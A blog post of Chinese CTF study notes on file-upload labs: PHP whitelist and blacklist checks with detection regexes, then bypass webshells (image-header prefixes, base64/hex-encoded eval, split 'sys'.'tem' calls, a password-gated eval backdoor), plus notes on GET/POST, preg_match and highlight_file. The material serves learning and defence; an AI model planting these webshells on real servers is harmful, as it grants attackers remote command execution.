news 2026/4/3 7:18:00

文件上传靶场的3种白名单,3种黑名单,以及3种针对文件内容的修改。特性靶场、get,post传参方式区别(抓包看看),正则匹配,以及高亮函数作用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
文件上传靶场的3种白名单,3种黑名单,以及3种针对文件内容的修改。特性靶场、get,post传参方式区别(抓包看看),正则匹配,以及高亮函数作用

上传靶场:

一、文件上传三种白名单验证

1 .扩展名白名单

// 只允许特定的安全扩展名 $allowed_ext = ['.jpg', '.png', '.gif', '.pdf', '.doc']; $ext = strtolower(strrchr($filename, '.')); if(!in_array($ext, $allowed_ext)) { die("文件类型不允许"); }

特点:最安全的验证方式,只允许已知安全的扩展名。

2.MIME类型白名单

// 只允许特定的Content-Type $allowed_mime = [ 'image/jpeg', 'image/png', 'image/gif', 'application/pdf' ]; $file_mime = $_FILES['file']['type']; if(!in_array($file_mime, $allowed_mime)) { die("文件MIME类型不允许"); } ​

特点:基于HTTP头的Content-Type验证,但容易被伪造。

3.文件内容头白名单

// 检查文件魔术字节(文件头) $allowed_magic = [ "\xFF\xD8\xFF", // JPEG "\x89PNG\r\n\x1A\n", // PNG "GIF89a", // GIF "%PDF" // PDF ]; $file_header = file_get_contents($tmp_file, false, null, 0, 8); $valid = false; foreach($allowed_magic as $magic) { if(strpos($file_header, $magic) === 0) { $valid = true; break; } } if(!$valid) die("文件内容类型不允许");

特点:最可靠的验证方式,检查文件的实际内容特征。

二、文件上传三种黑名单验证

1.扩展名黑名单

php

// 禁止危险扩展名 $deny_ext = ['.php', '.php5', '.php4', '.php3', '.phtml', '.phar', '.asp', '.aspx', '.jsp', '.jspx', '.pl', '.py', '.sh']; $ext = strtolower(strrchr($filename, '.')); if(in_array($ext, $deny_ext)) { die("危险文件类型禁止上传"); }

特点:不安全,容易被未列出的扩展名绕过(如.php6、.php7等)。

2.危险关键词黑名单

php

// 禁止文件名包含危险关键词 $dangerous_keywords = ['shell', 'webshell', 'backdoor', 'cmd', 'exec', 'eval', 'system', 'passthru', 'phpinfo']; $filename_lower = strtolower($filename); foreach($dangerous_keywords as $keyword) { if(strpos($filename_lower, $keyword) !== false) { die("文件名包含危险关键词"); } }

特点:容易被大小写、编码、拆分等方式绕过。

3.文件内容黑名单

php

// 扫描文件内容是否包含危险代码 $dangerous_patterns = [ '/<\?php/i', '/eval\s*\(/i', '/system\s*\(/i', '/shell_exec\s*\(/i', '/passthru\s*\(/i', '/proc_open\s*\(/i', '/popen\s*\(/i' ]; $file_content = file_get_contents($tmp_file); foreach($dangerous_patterns as $pattern) { if(preg_match($pattern, $file_content)) { die("文件内容包含危险代码"); } }

特点:可能被编码、混淆、分块等方式绕过。

三、三种针对文件内容的修改绕过技术

1.添加合法文件头绕过

php

// 在Webshell前添加图片头 GIF89a; // 或 JPEG、PNG头 <?php @eval($_POST['cmd']); ?>

原理:让文件同时具有合法图片特征和恶意代码。

2.编码混淆绕过

php

<?php // Base64编码绕过 eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7')); // 等同于:system($_GET['cmd']); ​ // 十六进制编码 eval(pack('H*','73797374656d28245f4745545b27636d64275d293b')); ​ // 多级编码 eval(gzuncompress(base64_decode('eJxLzClJLVKwVQAAOQAF'))); ?>

原理:将恶意代码编码,避免直接匹配关键词。

3.字符串拆分与拼接绕过

php

<?php // 敏感函数拆分 $a = 'sys'.'tem'; $b = 'who'.'ami'; $a($b); ​ // 使用变量函数 $func = 'ph'.'pinfo'; $func(); ​ // 数组方式 $arr = array('s','y','s','t','e','m'); $func = implode('', $arr); $func('id'); ​ // 通过常量定义 define('CMD', 's'.'y'.'s'.'t'.'e'.'m'); CMD('whoami'); ?>

原理:将敏感字符串拆分成无害部分,运行时再组合。

四、补充:高级绕过技术

1.条件执行绕过

php

<?php // 只在特定条件下执行 if(isset($_GET['key']) && $_GET['key'] == 'secret123') { @eval($_POST['cmd']); } else { echo "正常图片内容"; } ?>

2.注释符混淆

php

<?php // 利用注释干扰检测 /*<?php */eval/*注释*/($_POST/*注释*/['cmd'])/*注释*/;//*/ ?> ?>

3.多语言标签混淆

php

<?php // 使用短标签 <?=system($_GET['cmd'])?> ​ // ASP风格标签(如果服务器支持) <% eval request("cmd") %> ​ // Script标签 <script language="php">system($_GET['cmd']);</script> ?>

特性靶场:

一、GET和POST传参方式区别

  • GET:参数通过URL传递,格式为?key1=value1&key2=value2

  • POST:参数通过请求体传递,不在URL中显示

抓包对比

GET请求示例:
GET /target.php?v1=1&v2=var_dump&v3=%29%3B%20var_dump%28%24ctfshow%29%3B%20%2F%2F%20%3A HTTP/1.1 Host: example.com User-Agent: ...

如web89

POST请求示例:
POST /target.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 15 ​ v1=1&v2=var_dump

如web97

二、正则匹配(preg_match

基本语法

php

preg_match(pattern, subject)

在题目中的应用

1. 检查是否包含冒号

php

preg_match("/\:/", $v2)
  • 模式:/\:/

  • 含义:匹配冒号字符:

  • 作用:检查$v2中是否包含冒号

2. 检查是否不包含冒号

php

!preg_match("/\:/", $v2)
  • 取反,检查$v2中是否不包含冒号

3. 常用正则模式
  • /[0-9]/- 匹配数字

  • /[a-z]/i- 匹配字母(不区分大小写)

  • /\./- 匹配点号

  • /\;/- 匹配分号

正则转义说明

  • \:中的反斜杠是转义字符

  • 因为:在正则中有特殊含义(如?:非捕获组)

  • 但单独:不需要转义,写/:也可以

三、高亮函数(highlight_file

基本功能

php

highlight_file(__FILE__);

php

show_source(__FILE__); // 别名

作用

  1. 语法高亮:将PHP代码以HTML格式输出

  2. 颜色标记

    • 关键字(如if,echo):通常为蓝色

    • 字符串:通常为红色

    • 注释:通常为绿色

    • 变量:通常为黑色

  3. 便于阅读:帮助开发者/攻击者理解代码结构

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/2 10:44:02

自动化设备的运动脊梁:直线电机线圈设计与驱动力分析

在现代自动化设备的演进中&#xff0c;直线电机马达内的线圈扮演着“心脏”般的角色。随着工业4.0和智能制造的深入&#xff0c;企业对于传动系统的精度与响应速度提出了更高要求&#xff0c;而直线电机线圈正是实现这一需求的关键技术载体。与传统旋转电机相比&#xff0c;直线…

作者头像 李华
网站建设 2026/4/3 6:20:43

LobeChat能否用于编写Argo CD配置?GitOps持续交付支持

LobeChat 能否用于编写 Argo CD 配置&#xff1f;GitOps 持续交付的 AI 增强之路 在云原生技术深度渗透研发流程的今天&#xff0c;一个常见的场景是&#xff1a;工程师面对一份复杂的 Argo CD Application YAML 文件&#xff0c;反复核对 repoURL 是否拼写正确、path 是否指向…

作者头像 李华
网站建设 2026/3/28 14:04:54

Dify智能体平台部署全指南:快速搭建企业级AI应用

Dify智能体平台部署全指南&#xff1a;快速搭建企业级AI应用 在企业智能化转型的浪潮中&#xff0c;一个现实问题反复浮现&#xff1a;大模型能力越来越强&#xff0c;但真正落地到业务系统却依然步履维艰。开发团队面对的是碎片化的工具链——提示词散落在文档里&#xff0c;知…

作者头像 李华
网站建设 2026/3/29 7:18:20

使用VSCode插件提升GPT-SoVITS开发效率技巧分享

使用VSCode插件提升GPT-SoVITS开发效率技巧分享 在AI语音合成领域&#xff0c;一个令人兴奋的趋势正悄然成型&#xff1a;你只需要一分钟的录音&#xff0c;就能“克隆”出几乎一模一样的声音。这不是科幻电影的情节&#xff0c;而是如今通过 GPT-SoVITS 这类开源项目已经可以…

作者头像 李华
网站建设 2026/3/25 0:01:04

使用YOLOv5进行图像检测与训练指南

使用YOLOv5进行图像检测与训练指南 在智能摄像头、工业质检和自动驾驶系统中&#xff0c;实时目标检测早已不再是“能不能做”的问题&#xff0c;而是“如何做得又快又准”的工程挑战。面对海量视觉数据&#xff0c;开发者需要一个既能快速迭代又能稳定部署的解决方案——YOLOv…

作者头像 李华